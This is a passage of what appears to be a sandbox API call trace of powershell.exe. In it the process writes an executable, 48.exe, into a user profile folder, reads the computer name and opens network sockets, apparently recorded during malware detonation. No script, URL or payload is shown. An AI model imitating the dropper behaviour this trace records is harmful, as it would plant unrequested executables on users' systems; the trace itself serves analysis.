(in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.439] CoTaskMemFree (pv=0x1f7a70) [0087.450] VirtualQuery (in: lpAddress=0x1c6edf90, lpBuffer=0x1c6eee50, dwLength=0x30 | out: lpBuffer=0x1c6eee50*(BaseAddress=0x1c6ed000, AllocationBase=0x1bd60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.451] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0087.451] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.451] CoTaskMemFree (pv=0x1f7a70) [0087.454] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0087.454] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.454] CoTaskMemFree (pv=0x1f7a70) [0087.454] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0087.454] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.454] CoTaskMemFree (pv=0x1f7a70) [0087.455] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0087.455] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.455] CoTaskMemFree (pv=0x1f7a70) [0087.461] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0087.461] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.461] CoTaskMemFree (pv=0x1f7a70) [0087.520] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0087.520] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.520] CoTaskMemFree (pv=0x1f7a70) [0087.522] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0087.522] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.522] CoTaskMemFree (pv=0x1f7a70) [0087.523] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0087.523] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.523] CoTaskMemFree (pv=0x1f7a70) [0087.526] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0087.526] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.526] CoTaskMemFree (pv=0x1f7a70) [0087.527] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0087.527] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.527] CoTaskMemFree (pv=0x1f7a70) [0087.529] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0087.529] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.529] CoTaskMemFree (pv=0x1f7a70) [0087.530] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0087.530] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.530] CoTaskMemFree (pv=0x1f7a70) [0087.556] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0087.556] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.556] CoTaskMemFree (pv=0x1f7a70) [0087.578] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0087.578] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.578] CoTaskMemFree (pv=0x1f7a70) [0087.596] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0087.596] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.596] CoTaskMemFree (pv=0x1f7a70) [0088.351] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0088.351] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0088.352] CoTaskMemFree (pv=0x1f7a70) [0088.355] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0088.355] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0088.355] CoTaskMemFree (pv=0x1f7a70) [0088.410] VirtualQuery (in: lpAddress=0x1c6ed5b0, lpBuffer=0x1c6ee470, dwLength=0x30 | out: lpBuffer=0x1c6ee470*(BaseAddress=0x1c6ed000, AllocationBase=0x1bd60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0088.489] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0088.489] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0088.489] CoTaskMemFree (pv=0x1f7a70) [0088.491] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0088.491] GetEnvironmentVariableW (in: lpName="userprofile", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="C:\\Users\\aETAdzjz") returned 0x11 [0088.491] CoTaskMemFree (pv=0x1f7a70) [0088.508] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0088.508] GetEnvironmentVariableW (in: lpName="userprofile", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="C:\\Users\\aETAdzjz") returned 0x11 [0088.508] CoTaskMemFree (pv=0x1f7a70) [0088.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c6ecf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0088.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c6ece50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0088.694] CoTaskMemAlloc (cb=0x20c) returned 0x1b2860e0 [0088.694] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b2860e0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0088.694] CoTaskMemFree (pv=0x1b2860e0) [0088.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c6ecfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0088.702] GetCurrentProcess () returned 0xffffffffffffffff [0088.702] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6ecf18 | out: TokenHandle=0x1c6ecf18*=0x368) returned 1 [0088.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1c6ecb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30 [0088.707] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c6ecfc0 | out: lpFileInformation=0x1c6ecfc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x3f871a3e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1 [0088.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c6ecb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45 [0088.709] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c6ecf70 | out: lpFileInformation=0x1c6ecf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x3f871a3e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1 [0088.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c6ec950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45 [0088.710] SetErrorMode (uMode=0x1) returned 0x1 [0088.710] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x370 [0088.710] GetFileType (hFile=0x370) returned 0x1 [0088.710] SetErrorMode (uMode=0x1) returned 0x1 [0088.710] GetFileType (hFile=0x370) returned 0x1 [0088.711] GetFileSize (in: hFile=0x370, lpFileSizeHigh=0x1c6ecf68 | out: lpFileSizeHigh=0x1c6ecf68*=0x0) returned 0x65b3 [0088.711] ReadFile (in: hFile=0x370, lpBuffer=0x303aeb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c6ece88, lpOverlapped=0x0 | out: lpBuffer=0x303aeb8*, lpNumberOfBytesRead=0x1c6ece88*=0x1000, lpOverlapped=0x0) returned 1 [0088.718] ReadFile (in: hFile=0x370, lpBuffer=0x303aeb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c6ecb68, lpOverlapped=0x0 | out: lpBuffer=0x303aeb8*, lpNumberOfBytesRead=0x1c6ecb68*=0x1000, lpOverlapped=0x0) returned 1 [0088.719] ReadFile (in: hFile=0x370, lpBuffer=0x303aeb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c6ec9b8, lpOverlapped=0x0 | out: lpBuffer=0x303aeb8*, lpNumberOfBytesRead=0x1c6ec9b8*=0x1000, lpOverlapped=0x0) returned 1 [0088.719] ReadFile (in: hFile=0x370, lpBuffer=0x303aeb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c6ec9b8, lpOverlapped=0x0 | out: lpBuffer=0x303aeb8*, lpNumberOfBytesRead=0x1c6ec9b8*=0x1000, lpOverlapped=0x0) returned 1 [0088.720] ReadFile (in: hFile=0x370, lpBuffer=0x303aeb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c6ec9b8, lpOverlapped=0x0 | out: lpBuffer=0x303aeb8*, lpNumberOfBytesRead=0x1c6ec9b8*=0x1000, lpOverlapped=0x0) returned 1 [0088.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c6ecf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0088.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c6ece40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0088.726] CoTaskMemAlloc (cb=0x20c) returned 0x1b2860e0 [0088.726] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b2860e0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0088.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c6ecfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0088.726] GetCurrentProcess () returned 0xffffffffffffffff [0088.726] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6ed178 | out: TokenHandle=0x1c6ed178*=0x370) returned 1 [0088.727] GetCurrentProcess () returned 0xffffffffffffffff [0088.727] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6ed178 | out: TokenHandle=0x1c6ed178*=0x36c) returned 1 [0088.727] GetCurrentProcess () returned 0xffffffffffffffff [0088.727] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6ecf18 | out: TokenHandle=0x1c6ecf18*=0x3a4) returned 1 [0088.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c6ecb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0088.728] GetCurrentProcess () returned 0xffffffffffffffff [0088.728] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6ed178 | out: TokenHandle=0x1c6ed178*=0x354) returned 1 [0088.728] GetCurrentProcess () returned 0xffffffffffffffff [0088.728] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6ed178 | out: TokenHandle=0x1c6ed178*=0x378) returned 1 [0088.738] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6ecdf8 | out: TokenHandle=0x1c6ecdf8*=0x37c) returned 1 [0088.748] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6ecdf8 | out: TokenHandle=0x1c6ecdf8*=0x380) returned 1 [0088.755] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\48.exe", nBufferLength=0x105, lpBuffer=0x1c6ed1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\48.exe", lpFilePart=0x0) returned 0x18 [0088.755] SetErrorMode (uMode=0x1) returned 0x1 [0088.755] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\48.exe" (normalized: "c:\\users\\aetadzjz\\48.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0088.756] GetFileType (hFile=0x384) returned 0x1 [0088.756] SetErrorMode (uMode=0x1) returned 0x1 [0088.756] GetFileType (hFile=0x384) returned 0x1 [0088.757] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x388 [0088.757] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x38c [0088.769] GetCurrentProcess () returned 0xffffffffffffffff [0088.769] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6ece58 | out: TokenHandle=0x1c6ece58*=0x3b0) returned 1 [0088.773] GetCurrentProcess () returned 0xffffffffffffffff [0088.773] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6ece58 | out: TokenHandle=0x1c6ece58*=0x3b4) returned 1 [0088.779] GetCurrentProcess () returned 0xffffffffffffffff [0088.779] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6ecd98 | out: TokenHandle=0x1c6ecd98*=0x3b8) returned 1 [0088.780] GetCurrentProcess () returned 0xffffffffffffffff [0088.780] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6ecd98 | out: TokenHandle=0x1c6ecd98*=0x3bc) returned 1 [0088.783] GetCurrentProcess () returned 0xffffffffffffffff [0088.783] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6ed3d8 | out: TokenHandle=0x1c6ed3d8*=0x3c0) returned 1 [0088.795] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c6eb498 | out: phkResult=0x1c6eb498*=0x3c4) returned 0x0 [0088.795] RegQueryValueExW (in: hKey=0x3c4, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c6eb41c, lpData=0x0, lpcbData=0x1c6eb418*=0x0 | out: lpType=0x1c6eb41c*=0x1, lpData=0x0, lpcbData=0x1c6eb418*=0xe) returned 0x0 [0088.795] CoTaskMemAlloc (cb=0x12) returned 0x1b2ba690 [0088.795] RegQueryValueExW (in: hKey=0x3c4, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c6eb3ec, lpData=0x1b2ba690, lpcbData=0x1c6eb3e8*=0xe | out: lpType=0x1c6eb3ec*=0x1, lpData="Client", lpcbData=0x1c6eb3e8*=0xe) returned 0x0 [0088.796] CoTaskMemFree (pv=0x1b2ba690) [0088.796] RegCloseKey (hKey=0x3c4) returned 0x0 [0088.806] CoTaskMemAlloc (cb=0xcd0) returned 0x1b2bf1f0 [0088.806] RasEnumConnectionsW (in: param_1=0x1b2bf1f0, param_2=0x1c6ed42c, param_3=0x1c6ed428 | out: param_1=0x1b2bf1f0, param_2=0x1c6ed42c, param_3=0x1c6ed428) returned 0x0 [0088.811] CoTaskMemFree (pv=0x1b2bf1f0) [0088.820] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1c6ed238 | out: lpWSAData=0x1c6ed238) returned 0 [0088.829] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x410 [0088.836] setsockopt (s=0x410, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0088.836] closesocket (s=0x410) returned 0 [0088.836] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x410 [0088.838] setsockopt (s=0x410, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0088.838] closesocket (s=0x410) returned 0 [0088.842] GetCurrentProcess () returned 0xffffffffffffffff [0088.842] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6ecab8 | out: TokenHandle=0x1c6ecab8*=0x410) returned 1 [0088.844] GetCurrentProcess () returned 0xffffffffffffffff [0088.844] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6ecab8 | out: TokenHandle=0x1c6ecab8*=0x414) returned 1 [0088.851] GetCurrentProcessId () returned 0xb08 [0088.856] CoTaskMemAlloc (cb=0x204) returned 0x1cf3d0 [0088.856] GetComputerNameW (in: lpBuffer=0x1cf3d0, nSize=0x3069ed8 | out: lpBuffer="YKYD69Q", nSize=0x3069ed8) returned 1 [0088.856] CoTaskMemFree (pv=0x1cf3d0) [0088.857] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c6ecf98 | out: phkResult=0x1c6ecf98*=0x418) returned 0x0 [0088.857] RegQueryValueExW (in: hKey=0x418, lpValueName="Library", lpReserved=0x0, lpType=0x1c6ecf1c, lpData=0x0, lpcbData=0x1c6ecf18*=0x0 | out: lpType=0x1c6ecf1c*=0x1, lpData=0x0, lpcbData=0x1c6ecf18*=0x1c) returned 0x0 [0088.857] CoTaskMemAlloc (cb=0x20) returned 0x1b2c01d0 [0088.857] RegQueryValueExW (in: hKey=0x418, lpValueName="Library", lpReserved=0x0, lpType=0x1c6eceec, lpData=0x1b2c01d0, lpcbData=0x1c6ecee8*=0x1c | out: lpType=0x1c6eceec*=0x1, lpData="netfxperf.dll", lpcbData=0x1c6ecee8*=0x1c) returned 0x0 [0088.857] CoTaskMemFree (pv=0x1b2c01d0) [0088.857] RegQueryValueExW (in: hKey=0x418, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c6ecf1c, lpData=0x0, lpcbData=0x1c6ecf18*=0x0 | out: lpType=0x1c6ecf1c*=0x4, lpData=0x0, lpcbData=0x1c6ecf18*=0x4) returned 0x0 [0088.857] RegQueryValueExW (in: hKey=0x418, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c6ecf20, lpData=0x1c6ecf1c, lpcbData=0x1c6ecf18*=0x4 | out: lpType=0x1c6ecf20*=0x4, lpData=0x1c6ecf1c*=0x1, lpcbData=0x1c6ecf18*=0x4) returned 0x0 [0088.857] RegQueryValueExW (in: hKey=0x418, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c6ecf1c, lpData=0x0, lpcbData=0x1c6ecf18*=0x0 | out: lpType=0x1c6ecf1c*=0x4, lpData=0x0, lpcbData=0x1c6ecf18*=0x4) returned 0x0 [0088.857] RegQueryValueExW (in: hKey=0x418, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c6ecf20, lpData=0x1c6ecf1c, lpcbData=0x1c6ecf18*=0x4 | out: lpType=0x1c6ecf20*=0x4, lpData=0x1c6ecf1c*=0x137a, lpcbData=0x1c6ecf18*=0x4) returned 0x0 [0088.858] RegCloseKey (hKey=0x418) returned 0x0 [0088.859] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c6ecf58 | out: phkResult=0x1c6ecf58*=0x418) returned 0x0 [0088.859] RegQueryValueExW (in: hKey=0x418, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c6ecedc, lpData=0x0, lpcbData=0x1c6eced8*=0x0 | out: lpType=0x1c6ecedc*=0x4, lpData=0x0, lpcbData=0x1c6eced8*=0x4) returned 0x0 [0088.859] RegQueryValueExW (in: hKey=0x418, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c6ecee0, lpData=0x1c6ecedc, lpcbData=0x1c6eced8*=0x4 | out: lpType=0x1c6ecee0*=0x4, lpData=0x1c6ecedc*=0x3, lpcbData=0x1c6eced8*=0x4) returned 0x0 [0088.859] RegQueryValueExW (in: hKey=0x418, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c6ecedc, lpData=0x0, lpcbData=0x1c6eced8*=0x0 | out: lpType=0x1c6ecedc*=0x4, lpData=0x0, lpcbData=0x1c6eced8*=0x4) returned 0x0 [0088.859] RegQueryValueExW (in: hKey=0x418, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c6ecee0, lpData=0x1c6ecedc, lpcbData=0x1c6eced8*=0x4 | out: lpType=0x1c6ecee0*=0x4, lpData=0x1c6ecedc*=0x20000, lpcbData=0x1c6eced8*=0x4) returned 0x0 [0088.859] RegQueryValueExW (in: hKey=0x418, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c6ecedc, lpData=0x0, lpcbData=0x1c6eced8*=0x0 | out: lpType=0x1c6ecedc*=0x3, lpData=0x0, lpcbData=0x1c6eced8*=0xaa) returned 0x0 [0088.859] RegQueryValueExW (in: hKey=0x418, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c6ecedc, lpData=0x306d1a0, lpcbData=0x1c6eced8*=0xaa | out: lpType=0x1c6ecedc*=0x3, lpData=0x306d1a0*, lpcbData=0x1c6eced8*=0xaa) returned 0x0 [0088.862] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0088.863] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x1c6ece90, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x41c [0088.864] VirtualQuery (in: lpAddress=0x1bc50000, lpBuffer=0x1c6ece88, dwLength=0x30 | out: lpBuffer=0x1c6ece88*(BaseAddress=0x1bc50000, AllocationBase=0x1bc50000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0x0)) returned 0x30 [0088.865] LocalFree (hMem=0x1b2bbb00) returned 0x0 [0088.865] RegCloseKey (hKey=0x418) returned 0x0 [0088.865] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x306de50, cbSid=0x1c6ece70 | out: pSid=0x306de50*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c6ece70) returned 1 [0088.867] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x1f4) returned 0x0 [0088.867] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x306e370, cbSid=0x1c6ecdd0 | out: pSid=0x306e370*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c6ecdd0) returned 1 [0088.868] ReleaseMutex (hMutex=0x420) returned 1 [0088.868] GetProcessTimes (in: hProcess=0x420, lpCreationTime=0x1c6ecde0, lpExitTime=0x1c6ecdd8, lpKernelTime=0x1c6ecdd0, lpUserTime=0x1c6ecdc8 | out: lpCreationTime=0x1c6ecde0, lpExitTime=0x1c6ecdd8, lpKernelTime=0x1c6ecdd0, lpUserTime=0x1c6ecdc8) returned 1 [0088.869] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x306f370, cbSid=0x1c6ece70 | out: pSid=0x306f370*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c6ece70) returned 1 [0088.869] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x3070190, cbSid=0x1c6ece70 | out: pSid=0x3070190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c6ece70) returned 1 [0088.870] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x3070fa8, cbSid=0x1c6ece70 | out: pSid=0x3070fa8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c6ece70) returned 1 [0088.870] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x3071db8, cbSid=0x1c6ece70 | out: pSid=0x3071db8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c6ece70) returned 1 [0088.870] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x3072bc8, cbSid=0x1c6ece20 | out: pSid=0x3072bc8*(Revision=0x1, 